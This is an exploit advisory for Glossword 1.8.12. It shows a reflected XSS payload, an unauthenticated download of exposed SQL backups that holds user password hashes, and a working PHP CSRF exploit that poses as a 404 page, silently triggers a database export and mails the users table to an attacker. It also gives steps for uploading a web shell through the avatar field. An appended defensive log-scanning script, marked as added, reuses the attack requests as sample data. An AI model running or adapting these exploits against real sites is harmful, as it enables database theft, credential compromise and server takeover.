Glossword 1.8.12 XSS & Database Backup Disclosure & CSRF & Shell upload

2013.02.04
Credit: AkaStep
Risk: High
Local: No
Remote: Yes
CVE: N/A

===================================================
Vulnerable Software: Glossword 1.8.12
Tested version: Glossword 1.8.12
Download: http://sourceforge.net/projects/glossword/files/glossword/1.8.12/
Vulns: XSS && Database Backup Disclosure && CSRF && Shell upload.
Dork: Powered by Glossword 1.8.12
===================================================
Tested On:
Debian squeeze 6.0.6
Server version: Apache/2.2.16 (Debian)
Apache traffic server 3.2.0
MYSQL: 5.1.66-0+squeeze1
PHP 5.3.3-7+squeeze14 with Suhosin-Patch (cli) (built: Aug 6 2012 20:08:59)
Copyright (c) 1997-2009 The PHP Group
Zend Engine v2.3.0, Copyright (c) 1998-2010 Zend Technologies
    with Suhosin v0.9.32.1, Copyright (c) 2007-2010, by SektionEins GmbH
===================================================
About vulns:

XSS:
http://hacker1.own/glosslatest/glossword/1.8/gw_admin.php?a="><script>alert(1);</script>&t=settings
===================================================
Database Backup disclosure:

root@debian:/etc/apache2/htdocs/hacker1/glosslatest/glossword/1.8/gw_temp/gw_export/sql_backup_2013-02Feb-03# grep 'umask' /etc/pam.d/common-session
session optional pam_umask.so umask=0067
root@debian:/etc/apache2/htdocs/hacker1/glosslatest/glossword/1.8/gw_temp/gw_export/sql_backup_2013-02Feb-03# umask -S
u=rwx,g=x,o=

# NOTE 1: Notice database backups chmod'ed to 777 by script #
# NOTICE 2: BELOW database backups are accessible via HTTP REQUESTS #

root@debian:/etc/apache2/htdocs/hacker1/glosslatest/glossword/1.8/gw_temp/gw_export/sql_backup_2013-02Feb-03# ls -liash
total 1.1M
65345 4.0K drwxrwxrwx 2 hacker1user hacker1user 4.0K Feb 3 08:41 .
60499 4.0K drwxr-xr-x 3 hacker1user hacker1user 4.0K Feb 3 08:40 ..
65347  68K -rwxrwxrwx 1 hacker1user hacker1user  64K Feb 3 08:40 backup_gwnew_abbr_phrase.sql
65346  12K -rwxrwxrwx 1 hacker1user hacker1user 9.8K Feb 3 08:40 backup_gwnew_abbr.sql
65367 4.0K -rwxrwxrwx 1 hacker1user hacker1user  402 Feb 3 08:40 backup_gwnew_auth_restore.sql
65359 4.0K -rwxrwxrwx 1 hacker1user hacker1user  304 Feb 3 08:40 backup_gwnew_captcha.sql
65350 4.0K -rwxrwxrwx 1 hacker1user hacker1user 1.3K Feb 3 08:40 backup_gwnew_component_actions.sql
65349 8.0K -rwxrwxrwx 1 hacker1user hacker1user 6.2K Feb 3 08:40 backup_gwnew_component_map.sql
65348 4.0K -rwxrwxrwx 1 hacker1user hacker1user 1.7K Feb 3 08:40 backup_gwnew_component.sql
65365 4.0K -rwxrwxrwx 1 hacker1user hacker1user 1.5K Feb 3 08:40 backup_gwnew_custom_az_profiles.sql
65364  36K -rwxrwxrwx 1 hacker1user hacker1user  33K Feb 3 08:40 backup_gwnew_custom_az.sql
65368 240K -rwxrwxrwx 1 hacker1user hacker1user 234K Feb 3 08:41 backup_gwnew_dict_example.sql
65351 4.0K -rwxrwxrwx 1 hacker1user hacker1user 3.6K Feb 3 08:40 backup_gwnew_dict.sql
65374 268K -rwxrwxrwx 1 hacker1user hacker1user 263K Feb 3 08:41 backup_gwnew_history_terms.sql
65363 4.0K -rwxrwxrwx 1 hacker1user hacker1user 2.6K Feb 3 08:40 backup_gwnew_import_sessions.sql
65369 4.0K -rwxrwxrwx 1 hacker1user hacker1user  326 Feb 3 08:41 backup_gwnew_map_user_to_dict.sql
65370  24K -rwxrwxrwx 1 hacker1user hacker1user  23K Feb 3 08:41 backup_gwnew_map_user_to_term.sql
65353 8.0K -rwxrwxrwx 1 hacker1user hacker1user 4.3K Feb 3 08:40 backup_gwnew_pages_phrase.sql
65352 8.0K -rwxrwxrwx 1 hacker1user hacker1user 4.1K Feb 3 08:40 backup_gwnew_pages.sql
65354 4.0K -rwxrwxrwx 1 hacker1user hacker1user  485 Feb 3 08:40 backup_gwnew_search_results.sql
65355 4.0K -rwxrwxrwx 1 hacker1user hacker1user  538 Feb 3 08:40 backup_gwnew_sessions.sql
65356 8.0K -rwxrwxrwx 1 hacker1user hacker1user 4.2K Feb 3 08:40 backup_gwnew_settings.sql
65357 4.0K -rwxrwxrwx 1 hacker1user hacker1user  321 Feb 3 08:40 backup_gwnew_stat_dict.sql
65358 4.0K -rwxrwxrwx 1 hacker1user hacker1user  599 Feb 3 08:40 backup_gwnew_stat_search.sql
65373 8.0K -rwxrwxrwx 1 hacker1user hacker1user 8.0K Feb 3 08:41 backup_gwnew_theme_group.sql
65371 260K -rwxrwxrwx 1 hacker1user hacker1user 256K Feb 3 08:41 backup_gwnew_theme_settings.sql
65372 4.0K -rwxrwxrwx 1 hacker1user hacker1user 1.5K Feb 3 08:41 backup_gwnew_theme.sql
65361 4.0K -rwxrwxrwx 1 hacker1user hacker1user  908 Feb 3 08:40 backup_gwnew_topics_phrase.sql
65360 4.0K -rwxrwxrwx 1 hacker1user hacker1user  761 Feb 3 08:40 backup_gwnew_topics.sql
65362 4.0K -rwxrwxrwx 1 hacker1user hacker1user 3.2K Feb 3 08:40 backup_gwnew_users.sql
65366 4.0K -rwxrwxrwx 1 hacker1user hacker1user  949 Feb 3 08:40 backup_gwnew_virtual_keyboard.sql
65375  32K -rwxrwxrwx 1 hacker1user hacker1user  29K Feb 3 09:03 backup_gwnew_wordlist.sql
65376  48K -rwxrwxrwx 1 hacker1user hacker1user  46K Feb 3 08:41 backup_gwnew_wordmap.sql
root@debian:/etc/apache2/htdocs/hacker1/glosslatest/glossword/1.8/gw_temp/gw_export/sql_backup_2013-02Feb-03# cd /tmp
root@debian:/tmp# wget --user-agent="BACKUP DISCLOSURE EXAMPLE" http://hacker1.own/glosslatest/glossword/1.8/gw_temp/gw_export/sql_backup_2013-02Feb-03/backup_gwnew_users.sql && cat backup_gwnew_users.sql
--2013-02-03 09:13:17--  http://hacker1.own/glosslatest/glossword/1.8/gw_temp/gw_export/sql_backup_2013-02Feb-03/backup_gwnew_users.sql
Resolving hacker1.own... 127.0.0.1
Connecting to hacker1.own|127.0.0.1|:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 3184 (3.1K) [text/plain]
Saving to: “backup_gwnew_users.sql”

100%[======================================================================================>] 3,184       --.-K/s   in 0s

2013-02-03 09:13:17 (13.7 MB/s) - “backup_gwnew_users.sql” saved [3184/3184]

SET NAMES 'utf8';
DROP TABLE IF EXISTS `gwnew_users`;
CREATE TABLE `gwnew_users` (
  `id_user` int(10) unsigned NOT NULL AUTO_INCREMENT,
  `login` varbinary(128) NOT NULL,
  `password` char(32) NOT NULL,
  `is_active` tinyint(1) unsigned NOT NULL DEFAULT '1',
  `is_multiple` tinyint(1) unsigned NOT NULL DEFAULT '0',
  `is_show_contact` tinyint(1) unsigned NOT NULL DEFAULT '1',
  `date_reg` int(10) unsigned NOT NULL DEFAULT '0',
  `date_login` int(10) unsigned NOT NULL DEFAULT '0',
  `int_items` int(10) unsigned NOT NULL DEFAULT '0',
  `user_fname` varbinary(64) NOT NULL,
  `user_sname` varbinary(64) NOT NULL,
  `user_email` varchar(255) NOT NULL,
  `user_perm` blob NOT NULL,
  `user_settings` blob NOT NULL,
  PRIMARY KEY (`id_user`)
) ENGINE=MyISAM AUTO_INCREMENT=4 DEFAULT CHARSET=utf8;
INSERT INTO `gwnew_users` VALUES ('1','guest','084e0343a0486ff05530df6c705c8bb4','1','0','0','0','1359897241','1','Guest','','guest@localhost.tld','a:0:{}',0x613a343a7b733a363a226c6f63616c65223b733a333a22656e67223b733a383a226c6f636174696f6e223b733a303a22223b733a31303a22676d745f6f6666736574223b733a313a2230223b733a31323a2264696374696f6e6172696573223b613a303a7b7d7d);
INSERT INTO `gwnew_users` VALUES ('2','admin','01a8e7efac66ec52b417af55940e4719','1','0','1','1359915020','1359898817','23','Admin User',' ','admin@hacker1.own','a:16:{s:8:\"IS-EMAIL\";i:1;s:8:\"IS-LOGIN\";i:1;s:11:\"IS-PASSWORD\";i:1;s:8:\"IS-USERS\";i:1;s:13:\"IS-TOPICS-OWN\";i:1;s:9:\"IS-TOPICS\";i:1;s:12:\"IS-DICTS-OWN\";i:1;s:8:\"IS-DICTS\";i:1;s:12:\"IS-TERMS-OWN\";i:1;s:8:\"IS-TERMS\";i:1;s:15:\"IS-TERMS-IMPORT\";i:1;s:15:\"IS-TERMS-EXPORT\";i:1;s:13:\"IS-CPAGES-OWN\";i:1;s:9:\"IS-CPAGES\";i:1;s:15:\"IS-SYS-SETTINGS\";i:1;s:10:\"IS-SYS-MNT\";i:1;}',...);
INSERT INTO `gwnew_users` VALUES ('3','test','098f6bcd4621d373cade4e832627b4f6','1','0','1','1359898749','0','0','','','','a:0:{}',0x613a333a7b733a383a226c6f636174696f6e223b733a303a22223b733a31313a226c6f63616c655f6e616d65223b733a373a22656e2d75746638223b733a31323a2264696374696f6e6172696573223b613a303a7b7d7d);
root@debian:/tmp#

In this example (backup_gwnew_users.sql), gwnew_ is my custom table prefix. In fact, while installing the script it is gw_.
Feel free to create your own bruteforcer. The format is:
sql_backup_2013-02Feb-03/backup_{TABLE_PREFIX}_users.sql

Also, the table prefix is not a panacea ANYMORE. If the directory index is not forbidden on the remote site/server, you can see the whole
site.tld/gw_export/sql_backup_2013-02Feb-03/
directory structure and you can download it that way.

Ok, this is not the end. There is another vector of exploitation using the CSRF vulnerability.
Here we go (CSRF + database dump stealer). Simply trick the logged-in admin into visiting a malicious page.
If the attack is successful, it will silently @mail the victim's database to you.

==============EXPLOIT BEGINS=====================
<?php
error_reporting(0);
//echo '/gw_temp/gw_export/sql_backup_'. date('Y-mM-d');
/*
http://hacker1.own/glosslatest/glossword/1.8/gw_temp/gw_export/sql_backup_2013-02Feb-03/
*/
//exit;
define("TARGETSITE",'http://hacker1.own/glosslatest/glossword/1.8/');
define("HACKERMAIL",'hacker@g00glemail.tld');
define("STANDARDTABLEPREFIX",'gw_');
header('Status: 404 Not found!');
echo '<h1>Not Found</h1>
<p>The requested URL was not found on this server.</p>
<hr>
<address>Apache Server at '.$_SERVER['HTTP_HOST'].' Port ' . $_SERVER['SERVER_PORT'] . '</address>' . str_repeat(PHP_EOL,500);

for($i=1;$i<8;$i++)
{
echo '<img src="' . TARGETSITE . '/gw_admin.php?a=maintenance&t=settings&w1=8&w2=' . $i . '&w3=" heigth="0" width="0" />' .PHP_EOL;
}

$data=TARGETSITE . '/gw_temp/gw_export/sql_backup_'. date('Y-mM-d') . '/backup_' . STANDARDTABLEPREFIX .'users.sql';
//echo TARGETSITE . '/gw_temp/gw_export/sql_backup_'. date('Y-mM-d') . '/backup_' . STANDARDTABLEPREFIX .'users.sql';exit;
//@mail(HACKERMAIL,'Hello xDuMpS!','CHKOUT' . TARGETSITE . /gw_temp/gw_export/sql_backup_'. date('Y-mM-d') .
$s=file_get_contents($data);
/*uncomment if you want to save on your server
# file_put_contents(md5(rand(1,1000)) . '.txt',$s);*/
@mail(HACKERMAIL,'Hello xDuMpS!','CHKOUT' . htmlspecialchars($data) . PHP_EOL . htmlspecialchars($s) .PHP_EOL);
exit;
?>
================EXPLOIT ENDS HERE======================

Ok, now about the shell upload vulnerability (requires administrative access to the site).
After gaining access to the admin panel (e.g. via XSS or using the backup disclosure), go to:
http://site.tld/gw_admin.php?a=edit-own&t=users
Upload your shell using the Avatar settings tab.
Don't bother about "*The following file types are allowed: jpg, png*" because it is wrong information.
Trace it like this, access it and travel xD
http://s006.radikal.ru/i215/1302/27/d4b52ad33b39.png
Backup image: http://oi47.tinypic.com/crsde.jpg
================================================
KUDOSSSSSSS
================================================
packetstormsecurity.org
packetstormsecurity.com
packetstormsecurity.net
securityfocus.com
cxsecurity.com
security.nnov.ru
securtiyvulns.com
securitylab.ru
secunia.com
securityhome.eu
exploitsdownload.com
osvdb.com
websecurity.com.ua
1337day.com
itsecuritysolutions.org
to all Aa Team + to all Azerbaijan Black HatZ + *Especially to my bro CAMOUFL4G3 *
To All Turkish Hackers
Also special thanks to: ottoman38 & HERO_AZE
================================================
/AkaStep
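As an added defender-side example (not part of the advisory or of Glossword itself), the script below reproduces the guessable export-directory name the advisory relies on and scans Apache access-log lines for the three request patterns it describes: successful fetches under gw_temp/gw_export/sql_backup_*, markup in the reflected `a` parameter of gw_admin.php, and the `a=maintenance&...&w1=8` export request arriving with a foreign or missing Referer, which is what the hidden `<img>` tags of the CSRF page produce. The log format, the host name hacker1.own and the sample lines are assumptions constructed for the demonstration.

```python
import re
from datetime import date
from urllib.parse import parse_qs, unquote, urlparse

# Apache "combined" access-log line (format assumed here; not taken from the advisory).
LOG_RE = re.compile(
    r'(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<path>\S+) \S+" '
    r'(?P<status>\d{3}) \S+ "(?P<referer>[^"]*)" "(?P<ua>[^"]*)"')

def backup_dir_name(year, month, day):
    """Export folder Glossword names with PHP date('Y-mM-d'), e.g. sql_backup_2013-02Feb-03; date-only, so guessable."""
    return "sql_backup_" + date(year, month, day).strftime("%Y-%m%b-%d")

def classify(line, site_host):
    """Label one log line with the advisory pattern it matches, or None."""
    m = LOG_RE.match(line)
    if not m:
        return None
    url = urlparse(m["path"])
    path, qs = unquote(url.path), parse_qs(url.query)
    # 1. Successful fetch of a backup file or directory index under gw_temp/gw_export.
    if "/gw_temp/gw_export/sql_backup_" in path and m["status"] == "200":
        return "backup-disclosure"
    if path.endswith("gw_admin.php"):
        a = qs.get("a", [""])[0]
        # 2. Markup characters in the reflected 'a' parameter.
        if "<" in a or '"' in a:
            return "xss-probe"
        # 3. Export (a=maintenance, w1=8) with a Referer from another host or none at all.
        ref_host = urlparse(m["referer"]).hostname
        if a == "maintenance" and qs.get("w1") == ["8"] and ref_host != site_host:
            return "csrf-export"
    return None

def scan(lines, site_host):
    """Return (client IP, label) for every line that matches a pattern."""
    hits = []
    for line in lines:
        label = classify(line, site_host)
        if label:
            hits.append((line.split(" ", 1)[0], label))
    return hits

# Constructed sample log: one hit per pattern plus one legitimate admin export (last line).
SAMPLE_LOG = """\
203.0.113.5 - - [03/Feb/2013:09:13:17 +0000] "GET /glossword/1.8/gw_temp/gw_export/sql_backup_2013-02Feb-03/backup_gw_users.sql HTTP/1.1" 200 3184 "-" "BACKUP DISCLOSURE EXAMPLE"
198.51.100.7 - - [03/Feb/2013:09:20:01 +0000] "GET /glossword/1.8//gw_admin.php?a=maintenance&t=settings&w1=8&w2=1&w3= HTTP/1.1" 200 512 "http://evil.example/404.html" "Mozilla/5.0"
198.51.100.9 - - [03/Feb/2013:09:25:44 +0000] "GET /glossword/1.8/gw_admin.php?a=%22%3E%3Cscript%3Ealert(1);%3C/script%3E&t=settings HTTP/1.1" 200 2048 "-" "Mozilla/5.0"
192.0.2.10 - - [03/Feb/2013:09:30:00 +0000] "GET /glossword/1.8/gw_admin.php?a=maintenance&t=settings&w1=8&w2=1&w3= HTTP/1.1" 200 512 "http://hacker1.own/glossword/1.8/gw_admin.php" "Mozilla/5.0"
"""
```

Running `scan(SAMPLE_LOG.splitlines(), "hacker1.own")` flags the first three lines and leaves the in-site admin export alone; on a real server, the permanent fix is still to move the export directory out of the web root (or deny it in the web server config) and to require a CSRF token on the maintenance action.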

References:

http://sourceforge.net/projects/glossword/files/glossword/1.8.12/


Copyright 2019, cxsecurity.com